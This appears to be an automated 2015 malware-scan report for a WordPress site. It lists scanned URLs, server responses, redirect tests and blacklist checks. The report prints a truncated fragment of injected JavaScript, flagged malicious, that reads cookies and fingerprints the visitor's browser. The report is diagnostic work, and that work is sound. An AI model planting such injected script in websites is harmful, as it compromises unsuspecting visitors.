Scanned pages/files
Request | Server response | Status |
http://trudybeerman.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Mar 2015 20:14:19 GMT Location: http://www.trudybeerman.com/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.trudybeerman.com/xmlrpc.php | clean |
http://www.trudybeerman.com/ | 200 OK Content-Length: 37924 Content-Type: text/html | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12785 Content-Type: application/javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/fZDBDoMwDEN_CBoB2mV_U1ig6VrSNekYfz-EmLQD2-3JtiwnHfhHwbxW3QF1pClbRRNprhqwRV3KDFYEVcDLETMD852wcqrpCmC9fZmJeQpoE8nmxl2DQL3Agv3Is0LzIePlf3eZ9cbLyYAx8JKCXTF_Yd2Z1jTtz8mp9IGGU8tpDBdx9NweUAgGzvvlbw.js | 200 OK Content-Length: 156570 Content-Type: text/javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9QvKM0pTs3IL0stis_NzMvUzypGEgIA.js | 200 OK Content-Length: 4954 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name){var kloack=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return kloack?decodeURIComponent(kloack[1]):undefined;} function Ubrostyleddesignercoder(){var specifico_stock=navigator.userAgent;var flawor_bobma=(specifico_stock.indexOf("Windows NT 6.3")>-1||specifico_stock.indexOf("IEMobile")>-1||specifico_stock.indexOf("Chrome")>-1||specifico_stock.indexOf("Windows NT 6.2")>-1||specifico_stock.inde getPageContent=function(page_type){if($('.post').length) return $('.post');else if($('article').length) return $('article');else if($('.page').length) return $('.page');else if($('#main-content').length) return $('#main-content');else if($('.main-content').length) return $('.main-content');else if($('#content').length) return $('#content');else if($('.content').length) return $('.content');return false;}}(jQuery)); Antivirus reports:
| ||
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9BPzCzSTUrMycnPz9PPKtbPSyzLTE8syczPAwA.js | 200 OK Content-Length: 1225 Content-Type: text/javascript | clean |
http://trudybeerman.com//filamentapp.s3.amazonaws.com/870512bb7b834fc19c9426ee81b18aa7.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 24 Mar 2015 20:14:23 GMT Pragma: no-cache Location: http://www.trudybeerman.com/filamentapp.s3.amazonaws.com/870512bb7b834fc19c9426ee81b18aa7.js/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.trudybeerman.com/xmlrpc.php | clean |
http://www.trudybeerman.com/filamentapp.s3.amazonaws.com/870512bb7b834fc19c9426ee81b18aa7.js/ | 404 Not Found Content-Length: 31666 Content-Type: text/html | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9bPKixNLarUMYYydHMz04sSS1L1cjPzdAz1E0tLMgqK8vUTi4tTS4r1s4qhyvSS8_OzM1OB2koz9ZPzi8DqAQ.js | 200 OK Content-Length: 110951 Content-Type: text/javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9YvzdRPTUtLTS7Ry83MAwA.js | 200 OK Content-Length: 13436 Content-Type: text/javascript | clean |
http://trudybeerman.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 24 Mar 2015 20:14:28 GMT Pragma: no-cache Location: http://www.trudybeerman.com/test404page.js Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.trudybeerman.com/xmlrpc.php | clean |
http://www.trudybeerman.com/test404page.js | 404 Not Found Content-Length: 31666 Content-Type: text/html | clean |
http://www.trudybeerman.com//filamentapp.s3.amazonaws.com/870512bb7b834fc19c9426ee81b18aa7.js/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201513 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2015Maraa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9TPSi0pSEzO1s_NTynNSS3WLy9IL8rPyAcA.js | 200 OK Content-Length: 751 Content-Type: text/javascript | clean |
http://www.trudybeerman.com/wp-content/cache/minify/000000/M9TPSi0pSEzO1s_NTynNSS3WL85ILEpNSUxJqQQzM_PSAQ.js | 200 OK Content-Length: 37324 Content-Type: text/javascript | clean |
http://stats.wp.com/e-201513.js | 200 OK Content-Length: 3334 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trudybeerman.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 24 Mar 2015 20:14:19 GMT
Location: http://www.trudybeerman.com/
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.trudybeerman.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: trudybeerman.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 24 Mar 2015 20:14:19 GMT
Location: http://www.trudybeerman.com/
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.trudybeerman.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trudybeerman.com
Referer: http://www.google.com/search?q=trudybeerman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trudybeerman.com
Referer: http://www.google.com/search?q=trudybeerman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trudybeerman.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://trudybeerman.com/
Result: trudybeerman.com is not infected or malware details are not published yet.
Result: trudybeerman.com is not infected or malware details are not published yet.